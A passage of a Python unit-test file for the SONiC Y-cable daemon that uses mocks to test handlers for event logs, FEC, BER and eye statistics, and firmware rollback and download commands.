@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_locks', MagicMock(return_value=[0]))
def test_handle_show_event_cmd_arg_tbl_notification_no_port(self, port_instance, mock_swsscommon_table, port_instance_helper):
mock_table = MagicMock()
mock_swsscommon_table.return_value = mock_table
xcvrd_show_event_cmd_sts_tbl = mock_swsscommon_table
xcvrd_show_event_rsp_tbl = mock_swsscommon_table
xcvrd_show_event_res_tbl = mock_swsscommon_table
port_instance = MagicMock()
port_instance.get_event_log.return_value = ["log 1", "log 2"]
port_instance_helper = port_instance
asic_index = 0
port = "Ethernet0"
fvp = {"show_event": True}
rc = handle_show_event_cmd_arg_tbl_notification(
fvp, xcvrd_show_event_cmd_sts_tbl, xcvrd_show_event_rsp_tbl, xcvrd_show_event_res_tbl, asic_index, port)
assert(rc == -1)
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_instances')
@patch('swsscommon.swsscommon.Table')
@patch('ycable.ycable_utilities.y_cable_helper.gather_arg_from_db_and_check_for_type', MagicMock(return_value=(0, "fec", {"modex": "0",
"lane_mask": "0",
"direction": "0"})))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_locks', MagicMock(return_value=[0]))
@patch('ycable.ycable_utilities.y_cable_helper.get_ycable_physical_port_from_logical_port', MagicMock(return_value=(0)))
def test_handle_show_event_cmd_arg_tbl_notification_no_instance(self, port_instance, mock_swsscommon_table):
mock_table = MagicMock()
mock_swsscommon_table.return_value = mock_table
xcvrd_show_event_cmd_sts_tbl = mock_swsscommon_table
xcvrd_show_event_rsp_tbl = mock_swsscommon_table
xcvrd_show_event_res_tbl = mock_swsscommon_table
port_instance = MagicMock()
port_instance.get_event_log.return_value = ["log 1", "log 2"]
asic_index = 0
port = "Ethernet0"
fvp = {"show_event": True}
rc = handle_show_event_cmd_arg_tbl_notification(
fvp, xcvrd_show_event_cmd_sts_tbl, xcvrd_show_event_rsp_tbl, xcvrd_show_event_res_tbl, asic_index, port)
assert(rc == -1)
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_instances')
@patch('swsscommon.swsscommon.Table')
@patch('ycable.ycable_utilities.y_cable_helper.get_ycable_port_instance_from_logical_port')
@patch('ycable.ycable_utilities.y_cable_helper.gather_arg_from_db_and_check_for_type', MagicMock(return_value=(0, "fec", {"modex": "0",
"lane_mask": "0",
"direction": "0"})))
@patch('ycable.ycable_utilities.y_cable_helper.get_ycable_physical_port_from_logical_port', MagicMock(return_value=(0)))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_locks', MagicMock(return_value=[0]))
def test_handle_get_fec_cmd_arg_tbl_notification_no_status(self, port_instance, mock_swsscommon_table, port_instance_helper):
mock_table = MagicMock()
mock_swsscommon_table.return_value = mock_table
xcvrd_show_fec_rsp_tbl = mock_swsscommon_table
xcvrd_show_fec_cmd_sts_tbl = mock_swsscommon_table
xcvrd_show_fec_res_tbl = mock_swsscommon_table
port_instance = MagicMock()
asic_index = 0
port = "Ethernet0"
fvp = {"show_event": True}
rc = handle_get_fec_cmd_arg_tbl_notification(
fvp, xcvrd_show_fec_rsp_tbl, xcvrd_show_fec_cmd_sts_tbl, xcvrd_show_fec_res_tbl, asic_index, port)
assert(rc == None)
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_instances')
@patch('swsscommon.swsscommon.Table')
@patch('ycable.ycable_utilities.y_cable_helper.get_ycable_port_instance_from_logical_port')
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_locks', MagicMock(return_value=[0]))
def test_handle_get_fec_cmd_arg_tbl_notification_no_port(self, port_instance, mock_swsscommon_table, port_instance_helper):
mock_table = MagicMock()
mock_swsscommon_table.return_value = mock_table
xcvrd_show_fec_rsp_tbl = mock_swsscommon_table
xcvrd_show_fec_cmd_sts_tbl = mock_swsscommon_table
xcvrd_show_fec_res_tbl = mock_swsscommon_table
port_instance = MagicMock()
asic_index = 0
port = "Ethernet0"
fvp = {"get_fec": True}
rc = handle_get_fec_cmd_arg_tbl_notification(
fvp, xcvrd_show_fec_rsp_tbl, xcvrd_show_fec_cmd_sts_tbl, xcvrd_show_fec_res_tbl, asic_index, port)
assert(rc == -1)
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_instances')
@patch('swsscommon.swsscommon.Table')
@patch('ycable.ycable_utilities.y_cable_helper.get_ycable_physical_port_from_logical_port', MagicMock(return_value=(0)))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_locks', MagicMock(return_value=[0]))
def test_handle_get_fec_cmd_arg_tbl_notification_no_instance(self, port_instance, mock_swsscommon_table):
mock_table = MagicMock()
mock_swsscommon_table.return_value = mock_table
xcvrd_show_fec_rsp_tbl = mock_swsscommon_table
xcvrd_show_fec_cmd_sts_tbl = mock_swsscommon_table
xcvrd_show_fec_res_tbl = mock_swsscommon_table
port_instance = MagicMock()
port_instance_helper = port_instance
asic_index = 0
port = "Ethernet0"
fvp = {"get_fec": True}
rc = handle_get_fec_cmd_arg_tbl_notification(
fvp, xcvrd_show_fec_rsp_tbl, xcvrd_show_fec_cmd_sts_tbl, xcvrd_show_fec_res_tbl, asic_index, port)
assert(rc == -1)
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_instances')
@patch('swsscommon.swsscommon.Table')
@patch('ycable.ycable_utilities.y_cable_helper.get_ycable_port_instance_from_logical_port')
@patch('ycable.ycable_utilities.y_cable_helper.get_ycable_physical_port_from_logical_port', MagicMock(return_value=(0)))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_locks', MagicMock(return_value=[0]))
def test_handle_get_fec_cmd_arg_tbl_notification_get_result(self, port_instance, mock_swsscommon_table, port_instance_helper):
mock_table = MagicMock()
mock_swsscommon_table.return_value = mock_table
xcvrd_show_fec_rsp_tbl = mock_swsscommon_table
xcvrd_show_fec_cmd_sts_tbl = mock_swsscommon_table
xcvrd_show_fec_res_tbl = mock_swsscommon_table
port_instance = MagicMock()
port_instance.get_fec_mode.return_value = 0
port_instance.get_anlt.return_value = 0
port_instance.get_speed.return_value = 0
asic_index = 0
port = "Ethernet0"
fvp = {"get_fec": True}
rc = handle_get_fec_cmd_arg_tbl_notification(
fvp, xcvrd_show_fec_rsp_tbl, xcvrd_show_fec_cmd_sts_tbl, xcvrd_show_fec_res_tbl, asic_index, port)
assert(rc == None)
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_instances')
@patch('swsscommon.swsscommon.Table')
@patch('ycable.ycable_utilities.y_cable_helper.get_ycable_port_instance_from_logical_port')
@patch('ycable.ycable_utilities.y_cable_helper.gather_arg_from_db_and_check_for_type', MagicMock(return_value=(0, "fec", {"modex": "0",
"lane_mask": "0",
"direction": "0"})))
@patch('ycable.ycable_utilities.y_cable_helper.get_ycable_physical_port_from_logical_port', MagicMock(return_value=(0)))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_locks', MagicMock(return_value=[0]))
def test_handle_get_fec_cmd_arg_tbl_notification_no_status(self, port_instance, mock_swsscommon_table, port_instance_helper):
mock_table = MagicMock()
mock_swsscommon_table.return_value = mock_table
xcvrd_show_ber_cmd_arg_tbl = mock_swsscommon_table
xcvrd_show_ber_rsp_tbl = mock_swsscommon_table
xcvrd_show_ber_cmd_sts_tbl = mock_swsscommon_table
xcvrd_show_ber_res_tbl = mock_swsscommon_table
port_instance = MagicMock()
asic_index = 0
port = "Ethernet0"
fvp = {"show_event": True}
rc = handle_show_ber_cmd_arg_tbl_notification(
fvp, xcvrd_show_ber_cmd_arg_tbl, xcvrd_show_ber_rsp_tbl, xcvrd_show_ber_cmd_sts_tbl, xcvrd_show_ber_res_tbl, asic_index, port)
assert(rc == None)
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_instances')
@patch('swsscommon.swsscommon.Table')
@patch('ycable.ycable_utilities.y_cable_helper.get_ycable_port_instance_from_logical_port')
@patch('ycable.ycable_utilities.y_cable_helper.gather_arg_from_db_and_check_for_type', MagicMock(return_value=(0, "fec", {"modex": "0",
"lane_mask": "0",
"direction": "0"})))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_locks', MagicMock(return_value=[0]))
def test_handle_get_fec_cmd_arg_tbl_notification_no_port(self, port_instance, mock_swsscommon_table, port_instance_helper):
mock_table = MagicMock()
mock_swsscommon_table.return_value = mock_table
xcvrd_show_ber_cmd_arg_tbl = mock_swsscommon_table
xcvrd_show_ber_rsp_tbl = mock_swsscommon_table
xcvrd_show_ber_cmd_sts_tbl = mock_swsscommon_table
xcvrd_show_ber_res_tbl = mock_swsscommon_table
port_instance = MagicMock()
asic_index = 0
port = "Ethernet0"
fvp = {"get_ber": True}
rc = handle_show_ber_cmd_arg_tbl_notification(
fvp, xcvrd_show_ber_cmd_arg_tbl, xcvrd_show_ber_rsp_tbl, xcvrd_show_ber_cmd_sts_tbl, xcvrd_show_ber_res_tbl, asic_index, port)
assert(rc == -1)
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_instances')
@patch('swsscommon.swsscommon.Table')
@patch('ycable.ycable_utilities.y_cable_helper.gather_arg_from_db_and_check_for_type', MagicMock(return_value=(0, "fec", {"modex": "0",
"lane_mask": "0",
"direction": "0"})))
@patch('ycable.ycable_utilities.y_cable_helper.get_ycable_physical_port_from_logical_port', MagicMock(return_value=(0)))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_locks', MagicMock(return_value=[0]))
def test_handle_get_fec_cmd_arg_tbl_notification_no_instance(self, port_instance, mock_swsscommon_table):
mock_table = MagicMock()
mock_swsscommon_table.return_value = mock_table
xcvrd_show_ber_cmd_arg_tbl = mock_swsscommon_table
xcvrd_show_ber_rsp_tbl = mock_swsscommon_table
xcvrd_show_ber_cmd_sts_tbl = mock_swsscommon_table
xcvrd_show_ber_res_tbl = mock_swsscommon_table
port_instance = MagicMock()
asic_index = 0
port = "Ethernet0"
fvp = {"get_ber": True}
rc = handle_show_ber_cmd_arg_tbl_notification(
fvp, xcvrd_show_ber_cmd_arg_tbl, xcvrd_show_ber_rsp_tbl, xcvrd_show_ber_cmd_sts_tbl, xcvrd_show_ber_res_tbl, asic_index, port)
assert(rc == -1)
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_instances')
@patch('swsscommon.swsscommon.Table')
@patch('ycable.ycable_utilities.y_cable_helper.get_ycable_port_instance_from_logical_port')
@patch('ycable.ycable_utilities.y_cable_helper.gather_arg_from_db_and_check_for_type', MagicMock(return_value=(0, "ber", {"modex": "0",
"lane_mask": "0",
"direction": "0"})))
@patch('ycable.ycable_utilities.y_cable_helper.get_ycable_physical_port_from_logical_port', MagicMock(return_value=(0)))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_locks', MagicMock(return_value=[0]))
def test_handle_get_fec_cmd_arg_tbl_notification_get_ber(self, port_instance, mock_swsscommon_table, port_instance_helper):
mock_table = MagicMock()
mock_swsscommon_table.return_value = mock_table
xcvrd_show_ber_cmd_arg_tbl = mock_swsscommon_table
xcvrd_show_ber_rsp_tbl = mock_swsscommon_table
xcvrd_show_ber_cmd_sts_tbl = mock_swsscommon_table
xcvrd_show_ber_res_tbl = mock_swsscommon_table
port_instance = MagicMock()
port_instance.get_ber_info.return_value = ["100", "200"]
asic_index = 0
port = "Ethernet0"
fvp = {"get_ber": True}
rc = handle_show_ber_cmd_arg_tbl_notification(
fvp, xcvrd_show_ber_cmd_arg_tbl, xcvrd_show_ber_rsp_tbl, xcvrd_show_ber_cmd_sts_tbl, xcvrd_show_ber_res_tbl, asic_index, port)
assert(rc == None)
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_instances')
@patch('swsscommon.swsscommon.Table')
@patch('ycable.ycable_utilities.y_cable_helper.get_ycable_port_instance_from_logical_port')
@patch('ycable.ycable_utilities.y_cable_helper.gather_arg_from_db_and_check_for_type', MagicMock(return_value=(0, "eye", {"modex": "0",
"lane_mask": "0",
"direction": "0"})))
@patch('ycable.ycable_utilities.y_cable_helper.get_ycable_physical_port_from_logical_port', MagicMock(return_value=(0)))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_locks', MagicMock(return_value=[0]))
def test_handle_get_fec_cmd_arg_tbl_notification_get_eye(self, port_instance, mock_swsscommon_table, port_instance_helper):
mock_table = MagicMock()
mock_swsscommon_table.return_value = mock_table
xcvrd_show_ber_cmd_arg_tbl = mock_swsscommon_table
xcvrd_show_ber_rsp_tbl = mock_swsscommon_table
xcvrd_show_ber_cmd_sts_tbl = mock_swsscommon_table
xcvrd_show_ber_res_tbl = mock_swsscommon_table
port_instance = MagicMock()
port_instance.get_eye_info.return_value = ["100", "200"]
asic_index = 0
port = "Ethernet0"
fvp = {"get_ber": True}
rc = handle_show_ber_cmd_arg_tbl_notification(
fvp, xcvrd_show_ber_cmd_arg_tbl, xcvrd_show_ber_rsp_tbl, xcvrd_show_ber_cmd_sts_tbl, xcvrd_show_ber_res_tbl, asic_index, port)
assert(rc == None)
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_instances')
@patch('swsscommon.swsscommon.Table')
@patch('ycable.ycable_utilities.y_cable_helper.get_ycable_port_instance_from_logical_port')
@patch('ycable.ycable_utilities.y_cable_helper.gather_arg_from_db_and_check_for_type', MagicMock(return_value=(0, "fec_stats", {"modex": "0",
"lane_mask": "0",
"direction": "0"})))
@patch('ycable.ycable_utilities.y_cable_helper.get_ycable_physical_port_from_logical_port', MagicMock(return_value=(0)))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_locks', MagicMock(return_value=[0]))
def test_handle_get_fec_cmd_arg_tbl_notification_get_fec_stats(self, port_instance, mock_swsscommon_table, port_instance_helper):
mock_table = MagicMock()
mock_swsscommon_table.return_value = mock_table
xcvrd_show_ber_cmd_arg_tbl = mock_swsscommon_table
xcvrd_show_ber_rsp_tbl = mock_swsscommon_table
xcvrd_show_ber_cmd_sts_tbl = mock_swsscommon_table
xcvrd_show_ber_res_tbl = mock_swsscommon_table
port_instance = MagicMock()
port_instance.get_fec_stats.return_value = {"100": "200"}
asic_index = 0
port = "Ethernet0"
fvp = {"get_ber": True}
rc = handle_show_ber_cmd_arg_tbl_notification(
fvp, xcvrd_show_ber_cmd_arg_tbl, xcvrd_show_ber_rsp_tbl, xcvrd_show_ber_cmd_sts_tbl, xcvrd_show_ber_res_tbl, asic_index, port)
assert(rc == None)
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_instances')
@patch('swsscommon.swsscommon.Table')
@patch('ycable.ycable_utilities.y_cable_helper.get_ycable_port_instance_from_logical_port')
@patch('ycable.ycable_utilities.y_cable_helper.gather_arg_from_db_and_check_for_type', MagicMock(return_value=(0, "pcs_stats", {"modex": "0",
"lane_mask": "0",
"direction": "0"})))
@patch('ycable.ycable_utilities.y_cable_helper.get_ycable_physical_port_from_logical_port', MagicMock(return_value=(0)))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_locks', MagicMock(return_value=[0]))
def test_handle_get_fec_cmd_arg_tbl_notification_get_pcs_stats(self, port_instance, mock_swsscommon_table, port_instance_helper):
mock_table = MagicMock()
mock_swsscommon_table.return_value = mock_table
xcvrd_show_ber_cmd_arg_tbl = mock_swsscommon_table
xcvrd_show_ber_rsp_tbl = mock_swsscommon_table
xcvrd_show_ber_cmd_sts_tbl = mock_swsscommon_table
xcvrd_show_ber_res_tbl = mock_swsscommon_table
port_instance = MagicMock()
port_instance.get_pcs_stats.return_value = {"100": "200"}
asic_index = 0
port = "Ethernet0"
fvp = {"get_ber": True}
rc = handle_show_ber_cmd_arg_tbl_notification(
fvp, xcvrd_show_ber_cmd_arg_tbl, xcvrd_show_ber_rsp_tbl, xcvrd_show_ber_cmd_sts_tbl, xcvrd_show_ber_res_tbl, asic_index, port)
assert(rc == None)
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_instances')
@patch('swsscommon.swsscommon.Table')
@patch('ycable.ycable_utilities.y_cable_helper.get_ycable_port_instance_from_logical_port')
@patch('ycable.ycable_utilities.y_cable_helper.gather_arg_from_db_and_check_for_type', MagicMock(return_value=(0, "cable_alive", {"modex": "0",
"lane_mask": "0",
"direction": "0"})))
@patch('ycable.ycable_utilities.y_cable_helper.get_ycable_physical_port_from_logical_port', MagicMock(return_value=(0)))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_locks', MagicMock(return_value=[0]))
def test_handle_get_fec_cmd_arg_tbl_notification_get_alive_status(self, port_instance, mock_swsscommon_table, port_instance_helper):
mock_table = MagicMock()
mock_swsscommon_table.return_value = mock_table
xcvrd_show_ber_cmd_arg_tbl = mock_swsscommon_table
xcvrd_show_ber_rsp_tbl = mock_swsscommon_table
xcvrd_show_ber_cmd_sts_tbl = mock_swsscommon_table
xcvrd_show_ber_res_tbl = mock_swsscommon_table
port_instance = MagicMock()
port_instance.get_alive_status.return_value = True
asic_index = 0
port = "Ethernet0"
fvp = {"get_ber": True}
rc = handle_show_ber_cmd_arg_tbl_notification(
fvp, xcvrd_show_ber_cmd_arg_tbl, xcvrd_show_ber_rsp_tbl, xcvrd_show_ber_cmd_sts_tbl, xcvrd_show_ber_res_tbl, asic_index, port)
assert(rc == None)
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_instances')
@patch('swsscommon.swsscommon.Table')
@patch('ycable.ycable_utilities.y_cable_helper.get_ycable_port_instance_from_logical_port')
@patch('ycable.ycable_utilities.y_cable_helper.gather_arg_from_db_and_check_for_type', MagicMock(return_value=(0, "debug_dump", {"modex": "0",
"lane_mask": "0",
"direction": "0"})))
@patch('ycable.ycable_utilities.y_cable_helper.get_ycable_physical_port_from_logical_port', MagicMock(return_value=(0)))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_locks', MagicMock(return_value=[0]))
def test_handle_get_fec_cmd_arg_tbl_notification_get_debug_dump_registers(self, port_instance, mock_swsscommon_table, port_instance_helper):
mock_table = MagicMock()
mock_swsscommon_table.return_value = mock_table
xcvrd_show_ber_cmd_arg_tbl = mock_swsscommon_table
xcvrd_show_ber_rsp_tbl = mock_swsscommon_table
xcvrd_show_ber_cmd_sts_tbl = mock_swsscommon_table
xcvrd_show_ber_res_tbl = mock_swsscommon_table
port_instance = MagicMock()
port_instance.debug_dump_registers.return_value = {"register1": "100"}
asic_index = 0
port = "Ethernet0"
fvp = {"get_ber": True}
rc = handle_show_ber_cmd_arg_tbl_notification(
fvp, xcvrd_show_ber_cmd_arg_tbl, xcvrd_show_ber_rsp_tbl, xcvrd_show_ber_cmd_sts_tbl, xcvrd_show_ber_res_tbl, asic_index, port)
assert(rc == None)
"""
def handle_config_firmware_roll_cmd_arg_tbl_notification(fvp, xcvrd_roll_fw_cmd_sts_tbl, xcvrd_roll_fw_rsp_tbl, asic_index, port):
fvp_dict = dict(fvp)
if "rollback_firmware" in fvp_dict:
file_name = fvp_dict["rollback_firmware"]
status = 'False'
if file_name == 'null':
file_full_path = None
else:
file_full_path = '/usr/share/sonic/firmware/{}'.format(file_name)
if not os.path.isfile(file_full_path):
helper_logger.log_error("Error: cli cmd mux rollback firmware file does not exist port {} file {}".format(port, file_name))
set_result_and_delete_port('status', status, xcvrd_roll_fw_cmd_sts_tbl[asic_index], xcvrd_roll_fw_rsp_tbl[asic_index], port)
break
physical_port = get_ycable_physical_port_from_logical_port(port)
if physical_port is None or physical_port == PHYSICAL_PORT_MAPPING_ERROR:
# error scenario update table accordingly
helper_logger.log_warning("Error: Could not get physical port for cli cmd mux rollback firmware port {}".format(port))
set_result_and_delete_port('status', status, xcvrd_roll_fw_cmd_sts_tbl[asic_index], xcvrd_roll_fw_rsp_tbl[asic_index], port)
break
port_instance = get_ycable_port_instance_from_logical_port(port)
if port_instance is None or port_instance in port_mapping_error_values:
# error scenario update table accordingly
helper_logger.log_warning("Error: Could not get port instance for cli cmd mux rollback firmware port {}".format(port))
set_result_and_delete_port('status', status, xcvrd_roll_fw_cmd_sts_tbl[asic_index], xcvrd_roll_fw_rsp_tbl[asic_index], port)
with y_cable_port_locks[physical_port]:
try:
status = port_instance.rollback_firmware(file_full_path)
except Exception as e:
status = -1
helper_logger.log_warning("Failed to execute the rollback_firmware API for port {} due to {}".format(physical_port,repr(e)))
set_result_and_delete_port('status', status, xcvrd_roll_fw_cmd_sts_tbl[asic_index], xcvrd_roll_fw_rsp_tbl[asic_index], port)
else:
helper_logger.log_error("Wrong param for cli cmd mux rollback firmware port {}".format(port))
set_result_and_delete_port('status', 'False', xcvrd_roll_fw_cmd_sts_tbl[asic_index], xcvrd_roll_fw_rsp_tbl[asic_index], port)
"""
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_instances')
@patch('swsscommon.swsscommon.Table')
@patch('ycable.ycable_utilities.y_cable_helper.get_ycable_port_instance_from_logical_port')
@patch('ycable.ycable_utilities.y_cable_helper.gather_arg_from_db_and_check_for_type', MagicMock(return_value=(0, "fec", {"modex": "0",
"lane_mask": "0",
"direction": "0"})))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_locks', MagicMock(return_value=[0]))
def test_handle_config_firmware_roll_cmd_arg_tbl_notification_no_port(self, port_instance, mock_swsscommon_table, port_instance_helper):
mock_table = MagicMock()
mock_swsscommon_table.return_value = mock_table
xcvrd_down_fw_cmd_sts_tbl = mock_swsscommon_table
xcvrd_down_fw_rsp_tbl = mock_swsscommon_table
port_instance = MagicMock()
asic_index = 0
port = "Ethernet0"
fvp = {"rollback_firmware": "null"}
rc = handle_config_firmware_roll_cmd_arg_tbl_notification(
fvp, xcvrd_down_fw_cmd_sts_tbl, xcvrd_down_fw_rsp_tbl, asic_index, port)
assert(rc == -1)
@patch('swsscommon.swsscommon.Table')
@patch('ycable.ycable_utilities.y_cable_helper.gather_arg_from_db_and_check_for_type', MagicMock(return_value=(0, "fec", {"modex": "0",
"lane_mask": "0",
"direction": "0"})))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_locks', MagicMock(return_value=[0]))
def test_handle_config_firmware_roll_cmd_arg_tbl_notification_no_instance(self, mock_swsscommon_table):
mock_table = MagicMock()
mock_swsscommon_table.return_value = mock_table
xcvrd_down_fw_cmd_sts_tbl = mock_swsscommon_table
xcvrd_down_fw_rsp_tbl = mock_swsscommon_table
asic_index = 0
port = "Ethernet0"
fvp = {"rollback_firmware": "null"}
rc = handle_config_firmware_roll_cmd_arg_tbl_notification(
fvp, xcvrd_down_fw_cmd_sts_tbl, xcvrd_down_fw_rsp_tbl, asic_index, port)
assert(rc == -1)
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_instances')
@patch('swsscommon.swsscommon.Table')
@patch('ycable.ycable_utilities.y_cable_helper.gather_arg_from_db_and_check_for_type', MagicMock(return_value=(0, "fec", {"modex": "0",
"lane_mask": "0",
"direction": "0"})))
@patch('ycable.ycable_utilities.y_cable_helper.get_ycable_physical_port_from_logical_port', MagicMock(return_value=(0)))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_locks', MagicMock(return_value=[0]))
def test_handle_config_firmware_roll_cmd_arg_tbl_notification_with_instance(self, port_instance, mock_swsscommon_table):
mock_table = MagicMock()
mock_swsscommon_table.return_value = mock_table
xcvrd_down_fw_cmd_sts_tbl = mock_swsscommon_table
xcvrd_down_fw_rsp_tbl = mock_swsscommon_table
port_instance = MagicMock()
asic_index = 0
port = "Ethernet0"
fvp = {"rollback_firmware": "null"}
rc = handle_config_firmware_roll_cmd_arg_tbl_notification(
fvp, xcvrd_down_fw_cmd_sts_tbl, xcvrd_down_fw_rsp_tbl, asic_index, port)
assert(rc == None)
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_instances')
@patch('swsscommon.swsscommon.Table')
@patch('ycable.ycable_utilities.y_cable_helper.get_ycable_port_instance_from_logical_port')
@patch('ycable.ycable_utilities.y_cable_helper.gather_arg_from_db_and_check_for_type', MagicMock(return_value=(0, "fec", {"modex": "0",
"lane_mask": "0",
"direction": "0"})))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_locks', MagicMock(return_value=[0]))
def test_handle_config_firmware_roll_cmd_arg_tbl_notification_no_port_and_instance(self, port_instance, mock_swsscommon_table, port_instance_helper):
mock_table = MagicMock()
mock_swsscommon_table.return_value = mock_table
xcvrd_down_fw_cmd_sts_tbl = mock_swsscommon_table
xcvrd_down_fw_rsp_tbl = mock_swsscommon_table
port_instance = MagicMock()
asic_index = 0
port = "Ethernet0"
fvp = {"rollback_firmware": "null"}
rc = handle_config_firmware_roll_cmd_arg_tbl_notification(
fvp, xcvrd_down_fw_cmd_sts_tbl, xcvrd_down_fw_rsp_tbl, asic_index, port)
assert(rc == -1)
@patch('swsscommon.swsscommon.Table')
@patch('ycable.ycable_utilities.y_cable_helper.gather_arg_from_db_and_check_for_type', MagicMock(return_value=(0, "fec", {"modex": "0",
"lane_mask": "0",
"direction": "0"})))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_locks', MagicMock(return_value=[0]))
@patch('os.path.isfile', MagicMock(return_value=True))
def test_handle_config_firmware_down_cmd_arg_tbl_notification_no_port(self, mock_swsscommon_table):
mock_table = MagicMock()
mock_swsscommon_table.return_value = mock_table
xcvrd_down_fw_cmd_sts_tbl = mock_swsscommon_table
xcvrd_down_fw_rsp_tbl = mock_swsscommon_table
asic_index = 0
task_download_firmware_thread = {}
port = "Ethernet0"
fvp = {"download_firmware": "null"}
rc = handle_config_firmware_down_cmd_arg_tbl_notification(
fvp, xcvrd_down_fw_cmd_sts_tbl, xcvrd_down_fw_rsp_tbl, asic_index, port, task_download_firmware_thread)
assert(rc == -1)
@patch('swsscommon.swsscommon.Table')
@patch('ycable.ycable_utilities.y_cable_helper.gather_arg_from_db_and_check_for_type', MagicMock(return_value=(0, "fec", {"modex": "0",
"lane_mask": "0",
"direction": "0"})))
@patch('ycable.ycable_utilities.y_cable_helper.get_ycable_physical_port_from_logical_port', MagicMock(return_value=(0)))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_locks', MagicMock(return_value=[0]))
@patch('os.path.isfile', MagicMock(return_value=True))
def test_handle_config_firmware_down_cmd_arg_tbl_notification_else_condition(self, mock_swsscommon_table):
mock_table = MagicMock()
mock_swsscommon_table.return_value = mock_table
xcvrd_down_fw_cmd_sts_tbl = mock_swsscommon_table
xcvrd_down_fw_rsp_tbl = mock_swsscommon_table
asic_index = 0
task_download_firmware_thread = {}
port = "Ethernet0"
fvp = {"downoad_firmware": "null"}
rc = handle_config_firmware_down_cmd_arg_tbl_notification(
fvp, xcvrd_down_fw_cmd_sts_tbl, xcvrd_down_fw_rsp_tbl, asic_index, port, task_download_firmware_thread)
assert(rc == None)
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_instances')
@patch('swsscommon.swsscommon.Table')
@patch('ycable.ycable_utilities.y_cable_helper.get_ycable_port_instance_from_logical_port')
@patch('threading.Thread')
@patch('ycable.ycable_utilities.y_cable_helper.gather_arg_from_db_and_check_for_type', MagicMock(return_value=(0, "fec", {"modex": "0",
"lane_mask": "0",
"direction": "0"})))
@patch('ycable.ycable_utilities.y_cable_helper.get_ycable_physical_port_from_logical_port', MagicMock(return_value=(0)))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_locks', MagicMock(return_value=[0]))
@patch('os.path.isfile', MagicMock(return_value=True))
def test_handle_config_firmware_down_cmd_arg_tbl_notification_with_instance(self, port_instance, mock_swsscommon_table, port_instance_helper, thread_obj):
mock_table = MagicMock()
mock_swsscommon_table.return_value = mock_table
xcvrd_down_fw_cmd_sts_tbl = mock_swsscommon_table
xcvrd_down_fw_rsp_tbl = mock_swsscommon_table
port_instance = MagicMock()
thread_instance = MagicMock()
thread_instance.start = MagicMock()
thread_obj = thread_instance
port_instance_helper = port_instance
asic_index = 0
task_download_firmware_thread = {}
port = "Ethernet0"
fvp = {"download_firmware": "null"}
rc = handle_config_firmware_down_cmd_arg_tbl_notification(
fvp, xcvrd_down_fw_cmd_sts_tbl, xcvrd_down_fw_rsp_tbl, asic_index, port, task_download_firmware_thread)
assert(rc == None)
@patch('swsscommon.swsscommon.Table')
@patch('ycable.ycable_utilities.y_cable_helper.gather_arg_from_db_and_check_for_type', MagicMock(return_value=(0, "fec", {"modex": "0",
"lane_mask": "0",
"direction": "0"})))
@patch('ycable.ycable_utilities.y_cable_helper.get_ycable_physical_port_from_logical_port', MagicMock(return_value=(0)))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_locks', MagicMock(return_value=[0]))
@patch('os.path.isfile', MagicMock(return_value=True))
def test_handle_config_firmware_down_cmd_arg_tbl_notification_no_instance(self, mock_swsscommon_table):
mock_table = MagicMock()
mock_swsscommon_table.return_value = mock_table
xcvrd_down_fw_cmd_sts_tbl = mock_swsscommon_table
xcvrd_down_fw_rsp_tbl = mock_swsscommon_table
asic_index = 0
task_download_firmware_thread = {}
port = "Ethernet0"
fvp = {"download_firmware": "null"}
rc = handle_config_firmware_down_cmd_arg_tbl_notification(
fvp, xcvrd_down_fw_cmd_sts_tbl, xcvrd_down_fw_rsp_tbl, asic_index, port, task_download_firmware_thread)
assert(rc == -1)
@patch('swsscommon.swsscommon.Table')
@patch('ycable.ycable_utilities.y_cable_helper.gather_arg_from_db_and_check_for_type', MagicMock(return_value=(0, "fec", {"modex": "0",
"lane_mask": "0",
"direction": "0"})))
@patch('ycable.ycable_utilities.y_cable_helper.y_cable_port_locks', MagicMock(return_value=[0]))
@patch('os.path.isfile', MagicMock(return_value=True))
def test_handle_config_firmware_acti_cmd_arg_tbl_notification_no_port(self, mock_swsscommon_table):
mock_table = MagicMock()
mock_swsscommon_table.return_value = mock_table
xcvrd_down_fw_cmd_sts_tbl = mock_swsscommon_table
xcvrd_down_fw_rsp_tbl = mock_swsscommon_table
